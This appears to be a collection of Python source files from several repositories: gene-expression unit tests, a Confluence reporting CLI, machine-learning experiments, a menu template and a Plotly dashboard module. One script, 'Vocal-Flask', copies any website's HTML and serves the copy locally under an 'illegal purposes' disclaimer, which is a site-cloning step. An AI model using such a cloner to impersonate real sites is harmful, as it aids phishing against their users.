assert np.allclose(correct._resid_dist(dv, iv=dv), 0)
# residualizing against perfectly anticorrelated should also yield 0
assert np.allclose(correct._resid_dist(dv, iv=dv[::-1]), 0)
# residualizing against scaled self should also yield 0 (intercept incl)
assert np.allclose(correct._resid_dist(dv, iv=(dv + 10)), 0)
# residualizing against constant should yield de-meaned input
assert np.allclose(correct._resid_dist(dv, iv=np.ones_like(dv)),
dv - dv.mean())
def test_keep_stable_genes(donor_expression):
for thr, per, rank in itertools.product(np.arange(0, 1, 0.1),
[True, False],
[True, False]):
out = correct.keep_stable_genes(donor_expression, threshold=thr,
percentile=per, rank=rank)
assert all([isinstance(f, pd.DataFrame) for f in out])
for df1, df2 in itertools.combinations(out, 2):
assert df1.shape == df2.shape
# check that `return_stability` provides expression and stability
out, stab = correct.keep_stable_genes(donor_expression, threshold=0,
return_stability=True)
assert len(stab) == len(out[0].columns)
assert np.all(out[0].columns == donor_expression[0].columns)
```
#### File: abagen/tests/test_samples.py
```python
import numpy as np
import pandas as pd
import pytest
from abagen import samples_
from abagen.utils import first_entry, flatten_dict
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# generate fake data (based largely on real data) so we know what to expect #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
@pytest.fixture(scope='module')
def ontology():
""" Fake ontology dataframe
"""
sid = [4251, 4260, 4322, 4323, 9422]
hemi = ['L', 'R', 'L', 'R', np.nan]
acronym = ['S', 'S', 'Cl', 'Cl', 'CC']
path = [
'/4005/4006/4007/4008/4219/4249/12896/4251/',
'/4005/4006/4007/4008/4219/4249/12896/4260/',
'/4005/4006/4007/4275/4321/4322/',
'/4005/4006/4007/4275/4321/4323/',
'/4005/9352/9418/9422/',
]
name = [
'subiculum, left',
'subiculum, right',
'claustrum, left',
'claustrum, right',
'central canal',
]
return pd.DataFrame(dict(id=sid, hemisphere=hemi, name=name,
acronym=acronym, structure_id_path=path))
@pytest.fixture(scope='module')
def mm_annotation():
""" Fake annotation dataframe with some samples mislabelled
"""
mni_x = [-10, -20, 30, 40, 0]
sid = [4251, 4323, 4323, 4251, 9422]
sacr = ['S', 'Cl', 'Cl', 'S', 'CC']
sname = [
'subiculum, left',
'claustrum, right',
'claustrum, right',
'subiculum, left',
'central canal'
]
ind = pd.Series(range(len(sid)), name='sample_id')
return pd.DataFrame(dict(mni_x=mni_x, structure_id=sid,
structure_acronym=sacr, structure_name=sname),
index=ind)
@pytest.fixture(scope='module')
def annotation(mm_annotation):
""" Fake annotation dataframe
"""
out = mm_annotation.loc[[0, 2, 4]].reset_index(drop=True)
out.index.name = 'sample_id'
return out
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# test all the functions on our generated fake data so we know what to expect #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def test_update_mni_coords():
# xyz coordinates are getting replaced so who cares about the original
# but ids are important and need to be real!
x = y = z = [-10, 20, 30, 40]
ids = [594, 2985, 1058, 1145]
annotation = pd.DataFrame(dict(mni_x=x, mni_y=y, mni_z=z, well_id=ids))
out = samples_.update_mni_coords(annotation)
# confirm that no samples were lost / reordered during the update process
# and that we still have all our columns
assert np.all(out['well_id'] == annotation['well_id'])
assert np.all(out.columns == annotation.columns)
# but DO confirm that _something_ changes about the dataframes (i.e., our
# bogus coordinates should be different)
with pytest.raises(AssertionError):
pd.testing.assert_frame_equal(out, annotation)
assert np.all(out['mni_x'] != annotation['mni_x'])
assert np.all(out['mni_y'] != annotation['mni_y'])
assert np.all(out['mni_z'] != annotation['mni_z'])
# if we provide invalid well_ids we should receive an error!
annotation['well_id'] = [594, 2985, 1058, 99999999999]
with pytest.raises(KeyError):
samples_.update_mni_coords(annotation)
@pytest.mark.parametrize('path, expected', [
('/4005/4006/4007/4275/4276/4277/4278/12899/4286/', 'subcortex'),
('/4005/4006/4007/4275/4327/4341/4342/4344/', 'subcortex'),
('/4005/4006/4007/4008/4084/4103/4111/4112/4113/', 'cortex'),
('/4005/4006/4833/4696/4697/12930/12931/12933/4751/', 'cerebellum'),
('/4005/4006/9512/9676/9677/9680/9681/', 'brainstem'),
('/4005/4006/4833/9131/9132/9133/9492/', 'brainstem'),
('/4005/9218/9298/12959/265505622/', 'white matter'),
('/4005/9218/9219/9220/9227/', 'white matter'),
('/4005/9352/9418/9419/9708/', 'other'),
('/4005/9352/9353/9400/9402/', 'other'),
('/4005/4006/4833', None),
('thisisnotapath', None), # TODO: should this error?
])
def test__get_struct(path, expected):
out = samples_._get_struct(path)
assert out == expected if expected is not None else out is None
def test_drop_mismatch_samples(mm_annotation, ontology):
# here's what we expect (i.e., indices 1 & 3 are dropped and the structure
# for the remaining samples is correctly extracted from the paths)
expected = pd.DataFrame(dict(hemisphere=['L', 'R', np.nan],
mni_x=[-10, 30, 0],
structure_acronym=['S', 'Cl', 'CC'],
structure=['subcortex', 'subcortex', 'other'],
structure_id=[4251, 4323, 9422],
structure_name=['subiculum, left',
'claustrum, right',
'central canal']),
index=[0, 2, 4])
# do we get what we expect? (ignore ordering of columns / index)
out = samples_.drop_mismatch_samples(mm_annotation, ontology)
pd.testing.assert_frame_equal(out, expected, check_like=True)
def test__mirror_ontology(annotation, ontology):
aexp = pd.DataFrame(dict(mni_x=[-10, 30, 0],
structure_acronym=['S', 'Cl', 'CC'],
structure_id=[4260, 4322, 9422],
structure_name=['subiculum, right',
'claustrum, left',
'central canal']),
index=pd.Series(range(3), name='sample_id'))
# this function doesn't touch mni_x -- it just assumes that all the
    # hemisphere designations are incorrect and updates the structure id, name,
# and acronyms accordingly
a = samples_._mirror_ontology(annotation, ontology)
pd.testing.assert_frame_equal(a, aexp, check_like=True)
def test_mirror_samples(annotation, ontology):
# we're changing quite a bit of stuff in the annotation dataframe
aexp = pd.DataFrame(dict(mni_x=[-10, 30, 0, 10, -30],
structure_acronym=['S', 'Cl', 'CC', 'S', 'Cl'],
structure_id=[4251, 4323, 9422, 4260, 4322],
structure_name=['subiculum, left',
'claustrum, right',
'central canal',
'subiculum, right',
'claustrum, left']),
index=[0, 1, 2, 0, 1])
# but let's confirm all the outputs are as-expected
a = samples_.mirror_samples(annotation, ontology)
pd.testing.assert_frame_equal(a, aexp, check_like=True)
@pytest.mark.xfail
def test__assign_sample(atlas):
atlas = atlas['image']
assert samples_._assign_sample([[0, 0, 0]], atlas, tolerance=0) == 0
assert samples_._assign_sample([[26, 96, 66]], atlas, tolerance=0) == 71
assert False
@pytest.mark.xfail
def test__check_label():
assert False
@pytest.mark.xfail
def test_label_samples():
assert False
def test_groupby_index():
# default usage (no params)
microarray = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [0., 1.]],
index=pd.Series([1, 1, 1, 2], name='label'))
expected = pd.DataFrame([[2., 3.], [0., 1.]],
index=pd.Series([1, 2], name='label'))
out = samples_.groupby_index(microarray)
pd.testing.assert_frame_equal(out, expected, check_like=True)
# supplying `labels` appends NaN rows to output
expected = pd.DataFrame([[2., 3.], [0., 1.], [np.nan, np.nan]],
index=pd.Series([1, 2, 3], name='label'))
out = samples_.groupby_index(microarray, labels=[1, 2, 3])
pd.testing.assert_frame_equal(out, expected, check_like=True)
# changing `metric` works
expected = pd.DataFrame([[1., 2.], [0., 1.]],
index=pd.Series([1, 2], name='label'))
out = samples_.groupby_index(microarray, metric='median')
pd.testing.assert_frame_equal(out, expected, check_like=True)
def test_aggregate_samples():
m1 = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [0., 1.]],
index=pd.Series([1, 1, 1, 2], name='label'))
m2 = pd.DataFrame([[0., 1.], [1., 2.], [5., 6.], [10., 11.]],
index=pd.Series([1, 1, 2, 3], name='label'))
# region_agg='donors'
expected = pd.DataFrame([[1.25, 2.25],
[2.5, 3.5],
[10., 11.],
[np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='donors', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# region_agg = 'samples'
expected = pd.DataFrame([[1.4, 2.4],
[2.5, 3.5],
[10., 11.],
[np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='samples', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# return_donors=True, agg_metric='median'
expected = [
pd.DataFrame([[1., 2.], [0., 1.], [np.nan, np.nan], [np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label')),
pd.DataFrame([[0.5, 1.5], [5, 6], [10, 11], [np.nan, np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
]
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
return_donors=True, agg_metric='median')
for e, o in zip(expected, out):
pd.testing.assert_frame_equal(o, e, check_like=True)
# check that poorly normalized genes are removed
m1.loc[2, 1], m2.loc[2, 1] = np.nan, np.nan
expected = pd.DataFrame([[1.25],
[2.5],
[10],
[np.nan]],
index=pd.Series([1, 2, 3, 4], name='label'))
out = samples_.aggregate_samples([m1, m2], labels=[1, 2, 3, 4],
region_agg='donors', agg_metric='mean')
pd.testing.assert_frame_equal(out, expected, check_like=True)
# invalid method for region_agg
with pytest.raises(ValueError):
samples_.aggregate_samples([m1, m2], region_agg='notamethod')
# region_agg='samples' incompatible with return_donors=True
with pytest.raises(ValueError):
samples_.aggregate_samples([m1, m2], region_agg='samples',
return_donors=True)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# test all the above functions again on real data to make sure we don't choke #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def test_update_mni_coords_real(testfiles):
for annotation in flatten_dict(testfiles, 'annotation').values():
samples_.update_mni_coords(annotation)
def test_label_samples_real(testfiles, atlas):
out = samples_.label_samples(first_entry(testfiles, 'annotation'),
atlas['image'])
assert isinstance(out, pd.DataFrame)
assert out.index.name == 'sample_id'
assert out.columns == ['label']
def test_drop_mismatch_samples_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
for an, on in zip(annotation, ontology):
samples_.drop_mismatch_samples(an, on)
def test_mirror_samples_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
orig = [363, 470]
for an, on, o in zip(annotation, ontology, orig):
out = samples_.mirror_samples(an, on)
# there should be more than the original # of samples but less than or
# equal to 2x that number (we can't MORE than duplicate)
assert len(out) > o and len(out) <= o * 2
def test__mirror_ontology_real(testfiles):
annotation = flatten_dict(testfiles, 'annotation').values()
ontology = flatten_dict(testfiles, 'ontology').values()
orig = [363, 470]
for a, o, l in zip(annotation, ontology, orig):
annot = samples_._mirror_ontology(a, o)
assert len(annot) == l
``` |
{
"source": "4lovi4/pytest-confluence-report",
"score": 2
} |
#### File: pytest-confluence-report/report/__main__.py
```python
import textwrap
from typer import Option, run
from report import SETTINGS_PATH, XML_PATH, easy_build
def main(
settings_path: str = Option(
default=SETTINGS_PATH,
help=textwrap.dedent(
f'Confluence settings path (e.g ``{SETTINGS_PATH}``)'
),
),
xml_path: str = Option(
default=XML_PATH,
help=textwrap.dedent(f'Pytest XML artifact path e.g ``{XML_PATH}``.'),
),
) -> None:
"""Tool allows to convert pytest results into Confluence page."""
easy_build(settings_path, xml_path)
if __name__ == "__main__":
run(main)
``` |
{
"source": "4lpha-x/Vocal-Flask",
"score": 3
} |
#### File: 4lpha-x/Vocal-Flask/fLska.py
```python
try:
import requests
except ImportError:
print('Requests Module Not Found !!')
imp = input('Do You Want To Install Requests? y/n ')
    if imp in ('y', 'Y'):
import os
os.system('pip install requests')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed!')
print('Now Checking Flask Module')
try:
from flask import Flask
print('Program Starting..... ')
import os
import time
time.sleep(.45)
os.system('clear')
except ImportError:
print('Flask Module Not Found ')
imp = input('Do You Want To Install Flask? y/n ')
if imp=='y' or 'Y':
import os
os.system('pip install flask')
os.system('clear')
os.system('clear')
os.system('clear')
print('Installation Completed')
else:
exit();
#Importing
import time
col = '\033[1;31;40m'
def logo():
a = '''
┏┓╋┏┓╋╋╋╋╋╋╋╋╋╋┏━━┓╋╋╋┏━┳┓
┃┗┳┛┣━┳━┳━┓┏┳━━┫━┳┫┏━┓┃━┫┣┓
┗┓┃┏┫╋┃━┫╋┗┫┗┳━┫┏┫┗┫╋┗╋━┃━┫
╋┗━┛┗━┻━┻━━┻━┛╋┗┛┗━┻━━┻━┻┻┛'''
print(a)
print(col + ':::::::::::::Coded By Rc:::::::::::::')
print(':::::This Program Is Created For Testing Purposes Dont Use It For Any Illegal Purposes:::::')
time.sleep(1)
os.system('clear')
time.sleep(1)
os.system('clear')
print('\n>>>>>>>>>>>>>>>>Welcome To Vocal-Flask!!!<<<<<<<<<<<<<<<<<')
logo()
print('')
site = input('Enter Website URL Here : ')
try:
req = requests.get(site)
src = req.text
time.sleep(.34)
print('Getting Websites Source Code')
except:
print('Url Not Found Or Your Internet Is Not Available')
exit();
with open('src.html', 'w') as sorc:
r = sorc.write(src)
time.sleep(.65)
print('Saving Source Code As src.txt')
time.sleep(.23)
print('Moving The File To Template Folder ')
os.system('mv -f src.html templates')
time.sleep(.65)
print('File Moved Successfully!')
time.sleep(.45)
os.system('clear')
logo()
print("")
vol= '\033[3;37;40m'
print('Starting LocalHost At Port 5000')
print(vol + 'Localhost Started At Port Number 5000\nOpen 127.0.0.1:5000 In Your Browser To See Website')
print('\n')
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def hello():
return render_template('src.html')
app.run()
os.system('clear')
logo()
print('')
``` |
{
"source": "4lrz/ml-newbie",
"score": 3
} |
#### File: knn/challenge-1/data_gen.py
```python
import numpy as np
import knn.KNN as KNN
import random
def data_generator(mean, cov, count):
np.random.seed(1)
x, y = np.random.multivariate_normal(mean, cov, count).T
# plt.plot(x, y, 'x')
# plt.axis('equal')
# plt.show()
return [x, y]
def generate_dataset(count):
# class 1
mean1 = [0, 0]
cov1 = [[0.5, 0.3], [0.3, 1]]
# class 2
mean2 = [1, 2]
cov2 = [[0.25, 0.3], [0.3, 1]]
    # class 3
mean3 = [2, 0]
cov3 = [[0.5, 0.3], [0.3, 1]]
x1, y1 = data_generator(mean1, cov1, count)
x2, y2 = data_generator(mean2, cov2, count)
x3, y3 = data_generator(mean3, cov3, count)
my_classes = []
for i in range(len(x1) - 1):
my_classes.append([x1[i], y1[i], 'class1'])
my_classes.append([x2[i], y2[i], 'class2'])
my_classes.append([x3[i], y3[i], 'class3'])
random.shuffle(my_classes)
return my_classes
myknn = KNN.knn(data=generate_dataset(100), k=3, weight=0.67)
test, predicted = myknn.test_data()
ac, cm, re = myknn.report(test, predicted)
print(re, "\n")
print(cm, "\n")
print(ac, "\n")
```
#### File: parzen/challenge-3/ocr.py
```python
import cv2
import os
import csv
import parzen.PARZEN as parzen
def extract_features(image_path, vector_size, label):
img = cv2.imread(image_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
small = cv2.resize(gray, (vector_size, vector_size))
small = small.flatten()
features = (small).tolist()
features[-1] = str(label)
return features
def write_csv(images_path='persian_number/'):
files = [os.path.join(images_path, p) for p in sorted(os.listdir(images_path))]
final_path = {}
database = []
for f in files:
tmp_list = [os.path.join(f, p) for p in sorted(os.listdir(f))]
# tmp_list[-1] = f[8:]
final_path[f[15:]] = (tmp_list)
# print(f[15:])
with open('file.csv', "w") as csv_file:
for key, value in final_path.items():
writer = csv.writer(csv_file, delimiter=',')
for path in value:
writer.writerow(extract_features(path, 30, key))
write_csv()
# doesn't work for these features
# radius = [0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 1, 2, 3, 4]
#
# my_parzen = parzen.ParzenClassifier(csv_file='file.csv', data=None, r=radius, weight=.90)
# radius_accuracy_dict, best_radius = my_parzen.kfold_validation(10)
#
# test, predicted = my_parzen.test(best_radius)
#
# ac, cm, re = my_parzen.report(test, predicted)
#
# print(re, "\n")
# print(cm, "\n")
# print(ac, "\n")
```
#### File: ml-newbie/rbf/RadialBasisFunction.py
```python
import numpy as np
from numpy.linalg.linalg import pinv
from sklearn import datasets
def scale(data):
mat = np.asmatrix(data)
height, width = mat.shape
for i in range(0, width):
minimum = np.min(mat[:, i])
maximum = np.max(mat[:, i])
for k in range(0, height):
mat[k, i] = (mat[k, i] - minimum) / (maximum - minimum)
return mat
class RBFNetwork:
def __init__(self, pTypes, scaledData, labels):
self.pTypes = pTypes
self.protos = np.zeros(shape=(0, 4))
self.scaledData = scaledData
self.spread = 0
self.labels = labels
self.weights = 0
def generatePrototypes(self):
group1 = np.random.randint(0, 49, size=self.pTypes)
group2 = np.random.randint(50, 100, size=self.pTypes)
group3 = np.random.randint(101, 150, size=self.pTypes)
self.protos = np.vstack(
[self.protos, self.scaledData[group1, :], self.scaledData[group2, :], self.scaledData[group3, :]])
return self.protos
def sigma(self):
dTemp = 0
for i in range(0, self.pTypes * 3):
for k in range(0, self.pTypes * 3):
dist = np.square(np.linalg.norm(self.protos[i] - self.protos[k]))
if dist > dTemp:
dTemp = dist
self.spread = dTemp / np.sqrt(self.pTypes * 3)
def train(self):
self.generatePrototypes()
self.sigma()
hiddenOut = np.zeros(shape=(0, self.pTypes * 3))
for item in self.scaledData:
out = []
for proto in self.protos:
distance = np.square(np.linalg.norm(item - proto))
neuronOut = np.exp(-(distance) / (np.square(self.spread)))
out.append(neuronOut)
hiddenOut = np.vstack([hiddenOut, np.array(out)])
# print(hiddenOut)
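        # Output weights are the least-squares solution W = pinv(H) . T, where H is the
        # matrix of hidden RBF activations (one row per sample) and T the one-hot label
        # matrix; np.dot with the Moore-Penrose pseudo-inverse computes exactly that.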
self.weights = np.dot(pinv(hiddenOut), self.labels)
# print(self.weights)
def test(self):
items = [3, 4, 72, 82, 91, 120, 134, 98, 67, 145, 131]
for item in items:
data = self.scaledData[item]
out = []
for proto in self.protos:
distance = np.square(np.linalg.norm(data - proto))
neuronOut = np.exp(-(distance) / np.square(self.spread))
out.append(neuronOut)
netOut = np.dot(np.array(out), self.weights)
print('---------------------------------')
print(netOut)
print('Class is ', netOut.argmax(axis=0) + 1)
print('Given Class ', self.labels[item])
iris = datasets.load_iris()
X = iris.data[:, :]
y = iris.target
np.random.seed(1)
weight = 0.01
indices = np.random.permutation(len(X))
data = X[indices[:]]
labels = y[indices[:]]
oo = []
print(oo)
for o in labels:
if o == 0:
oo.append([1, 0, 0])
elif o == 1:
oo.append([0, 1, 0])
elif o == 2:
oo.append([0, 0, 1])
labels = oo
scaledData = scale(data)
network = RBFNetwork(4, scaledData, labels)
network.train()
network.test()
```
#### File: ml-newbie/som/SelfOrganizedMap.py
```python
import numpy as np
import itertools
class SOM(object):
def __init__(self, h, w, dim_feat):
"""
Construction of a zero-filled SOM.
h,w,dim_feat: constructs a (h,w,dim_feat) SOM.
"""
self.shape = (h, w, dim_feat)
self.som = np.zeros((h, w, dim_feat))
# Training parameters
self.L0 = 0.0
self.lam = 0.0
self.sigma0 = 0.0
self.data = []
self.hit_score = np.zeros((h, w))
def train(self, data, L0, lam, sigma0, initializer=np.random.rand, frames=None):
"""
Training procedure for a SOM.
data: a N*d matrix, N the number of examples,
d the same as dim_feat=self.shape[2].
L0,lam,sigma0: training parameters.
initializer: a function taking h,w and dim_feat (*self.shape) as
parameters and returning an initial (h,w,dim_feat) tensor.
frames: saves intermediate frames if not None.
"""
self.L0 = L0
self.lam = lam
self.sigma0 = sigma0
self.som = initializer(*self.shape)
self.data = data
for t in itertools.count():
if frames != None:
frames.append(self.som.copy())
if self.sigma(t) < 0.5:
print("final t:", t)
# print("quantization error:", self.quant_err())
break
i_data = np.random.choice(range(len(data)))
bmu = self.find_bmu(data[i_data])
self.hit_score[bmu] += 1
self.update_som(bmu, data[i_data], t)
def quant_err(self):
"""
Computes the quantization error of the SOM.
It uses the data fed at last training.
"""
bmu_dists = []
for input_vector in self.data:
bmu = self.find_bmu(input_vector)
bmu_feat = self.som[bmu]
bmu_dists.append(np.linalg.norm(input_vector - bmu_feat))
return np.array(bmu_dists).mean()
def find_bmu(self, input_vec):
"""
Find the BMU of a given input vector.
input_vec: a d=dim_feat=self.shape[2] input vector.
"""
list_bmu = []
for y in range(self.shape[0]):
for x in range(self.shape[1]):
dist = np.linalg.norm((input_vec - self.som[y, x]))
list_bmu.append(((y, x), dist))
list_bmu.sort(key=lambda x: x[1])
return list_bmu[0][0]
def update_som(self, bmu, input_vector, t):
"""
Calls the update rule on each cell.
bmu: (y,x) BMU's coordinates.
input_vector: current data vector.
t: current time.
"""
for y in range(self.shape[0]):
for x in range(self.shape[1]):
dist_to_bmu = np.linalg.norm((np.array(bmu) - np.array((y, x))))
self.update_cell((y, x), dist_to_bmu, input_vector, t)
def update_cell(self, cell, dist_to_bmu, input_vector, t):
"""
Computes the update rule on a cell.
cell: (y,x) cell's coordinates.
dist_to_bmu: L2 distance from cell to bmu.
input_vector: current data vector.
t: current time.
"""
self.som[cell] += self.N(dist_to_bmu, t) * self.L(t) * (input_vector - self.som[cell])
def update_bmu(self, bmu, input_vector, t):
"""
Update rule for the BMU.
bmu: (y,x) BMU's coordinates.
input_vector: current data vector.
t: current time.
"""
self.som[bmu] += self.L(t) * (input_vector - self.som[bmu])
def L(self, t):
"""
Learning rate formula.
t: current time.
"""
return self.L0 * np.exp(-t / self.lam)
def N(self, dist_to_bmu, t):
"""
Computes the neighbouring penalty.
dist_to_bmu: L2 distance to bmu.
t: current time.
"""
curr_sigma = self.sigma(t)
return np.exp(-(dist_to_bmu ** 2) / (2 * curr_sigma ** 2))
def sigma(self, t):
"""
Neighbouring radius formula.
t: current time.
"""
return self.sigma0 * np.exp(-t / self.lam)
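# Minimal usage sketch (illustrative only): trains a small map on random 3-D
# vectors just to exercise the train()/quant_err() API; the hyperparameters
# below (L0, lam, sigma0) are arbitrary guesses, not tuned values.
if __name__ == '__main__':
    demo_data = np.random.rand(500, 3)   # 500 samples, dim_feat = 3
    demo_som = SOM(10, 10, 3)            # 10x10 map of 3-dimensional cells
    demo_som.train(demo_data, L0=0.8, lam=1e2, sigma0=10)
    print("quantization error:", demo_som.quant_err())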
``` |
{
"source": "4lxprime/Python-Template",
"score": 3
} |
#### File: 4lxprime/Python-Template/Funny.py
```python
from pystyle import Colors, Colorate, Center
from art import text2art
import os
# LOGO
# IMPORT MODULES
creator = Center.XCenter("""
╔═════════════════════════════════╗
| <== CREATED BY 4LXPRIME ==> |
╚═════════════════════════════════╝
""")
# DEFINE CREATOR
tables = Center.XCenter("""
╔════════════════╗
| 1) text 1 |
╠════════════════╣
| 2) text 2 |
╠════════════════╣
| 3) text 3 |
╚════════════════╝
""")
# DEFINE TABLE
def intro():
logo = Center.XCenter(text2art("NAME", "random"))
# "NAME" IS THE TITLE OF THE TOOL AND "random" IS THE POLICE
print(Colorate.Horizontal(Colors.yellow_to_red, logo, 1))
print(" ")
print(Colorate.Horizontal(Colors.yellow_to_red, creator, 1))
print(" ")
print(" ")
# CODE
# DEFINE MAIN
def main():
os.system("cls") # CLEAN SCREEN
intro() # PRINT LOGO
print(Colorate.Horizontal(Colors.yellow_to_red, tables)) # PRINT TABLES
cmd = input("-> ")
if cmd == "1": # GO TO ONE
one()
elif cmd == "2": # GO TO TWO
two()
elif cmd == "3": # GO TO THREE
three()
def one(): # DEFINE ONE
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice one"))
main()
def two(): # DEFINE TWO
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice two"))
main()
def three(): # DEFINE THREE
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice three"))
main()
while True:
main()
``` |
{
"source": "4m1t0/performance-dashboard",
"score": 3
} |
#### File: scripts/modules/PerformanceReport.py
```python
import datetime
import logging
import pandas as pd
import plotly.offline as offline
import plotly.graph_objs as go
import sys
class PerformanceReport:
def __init__(self, reports):
"""Performance Report as pandas DataFrame.
Args:
reports [pandas.DataFrame]: Having performance test reports and \
following columns.
1. Name: test target.
2. # requests: number of requests.
3. 99%: 99%tile Latency. any %tile Latency is available \
because you have to assign key when plotting charts.
4. Median response time: 50%tile Latency.
5. Average response time: ditto.
6. Min response time: ditto.
7. Max response time: ditto.
8. # failures: number of failures.
9. Requests/s: requests per second.
10: DateTime [pandas.TimeStamp]: date executed test.
"""
self.fontsize = 11
self.reports = reports
self.reports.sort_values('DateTime', ascending=True, inplace=True)
def percentilePlot(self, name=None, key=None, filename=None):
if key is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
data = []
if name is None:
names = sorted(self.reports['Name'].unique(), reverse=False)
for name in names:
data.append(self._Scatter(name, key, 'Latency'))
else:
data.append(self._Scatter(name, key, 'Latency'))
key = key + 'tile' if '%' in key else key.split(' ')[0]
layout = go.Layout(
title=key + ' Latency Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def _Scatter(self, name, key, label):
text = [
'DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>' + label + ': ' + str(l)
for d, l in zip(
self.reports[self.reports['Name'] == name]['DateTime'].values,
self.reports[self.reports['Name'] == name][key].values)]
return go.Scatter(
x=self.reports[self.reports['Name'] == name]['DateTime'],
y=self.reports[self.reports['Name'] == name][key],
name=name,
text=text,
hoverinfo='text+name'
)
def rpsTimelineChart(self, name=None, filename=None):
if filename is None:
logging.critical(
'Invalid Usage: Please assign both name and filename.')
sys.exit(1)
data = []
if name is None:
names = sorted(self.reports['Name'].unique(), reverse=False)
for name in names:
data.append(self._Scatter(name, 'Requests/s', 'Requests/s'))
else:
data.append(self._Scatter(name, 'Requests/s', 'Requests/s'))
layout = go.Layout(
title='Rps Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def requestsTimelineChart(self, key=None, title=None, filename=None):
if key is None or title is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
names = sorted(self.reports['Name'].unique(), reverse=False)
data = []
for name in names:
t = key.split(' ')
text = [
'DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>' + t[0] + ' of ' + t[1] + ': ' + str(l)
for d, l in zip(
self.reports[self.reports['Name']
== name]['DateTime'].values,
self.reports[self.reports['Name'] == name][key].values)]
data.append(go.Scatter(
x=self.reports[self.reports['Name'] == name]['DateTime'],
y=self.reports[self.reports['Name'] == name][key],
name=name,
text=text,
hoverinfo='text+name'
))
layout = go.Layout(
title=title,
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def activityChart(self, filename=None):
now = datetime.datetime.now()
d_now = datetime.date(now.year, now.month, now.day)
offset = 0
delta = 365 + offset
pre_d_last_year = d_now - datetime.timedelta(days=delta)
if pre_d_last_year.weekday():
offset = pre_d_last_year.weekday()
d_last_year = d_now - datetime.timedelta(days=delta)
        # gives me a list with datetimes for each day of the year
dates_in_year = [d_last_year +
datetime.timedelta(i) for i in range(delta+1)]
        # gives [0,1,2,3,4,5,6,0,1,2,3,4,5,6,…] (ticktext in xaxis dict translates this to weekdays)
weekdays_in_year = [-1 * i.weekday() for i in dates_in_year]
# gives [1,1,1,1,1,1,1,2,2,2,2,2,2,2,…] name is self-explanatory
start_dates_of_week = [
d - datetime.timedelta(days=d.weekday()) if d.weekday() else d
for d in dates_in_year]
# z = np.random.randint(3, size=(len(dates_in_year))) / 2
df = pd.DataFrame({
'start_date': start_dates_of_week,
'weekday': weekdays_in_year,
'z': 0,
'commits': 0
})
# count contributions per a day
for report in self.reports['DateTime'].unique():
report_date = report.astype('M8[D]').astype('O')
weekday = report_date.weekday()
start_date_of_week = report_date - \
datetime.timedelta(days=weekday)
target_record = df[
(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday)]
if not target_record.empty:
df.loc[(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday), ['z']] \
= target_record['z'] + 1 \
if target_record['z'].values[0] < 2 else 2
df.loc[(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday), ['commits']] \
= target_record['commits'] + 1
# gives something like list of strings like '2018-01-25' for each date. Used in data trace to make good hovertext.
text = []
for date in dates_in_year:
start_date_of_week = date - \
datetime.timedelta(days=date.weekday())
commit = df[
(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * date.weekday())]['commits']
s = 'date: ' + str(date) + '<br>commits: ' + str(commit.values[0])
text.append(s)
data = [
go.Heatmap(
x=df['start_date'],
y=df['weekday'],
z=df['z'],
text=text,
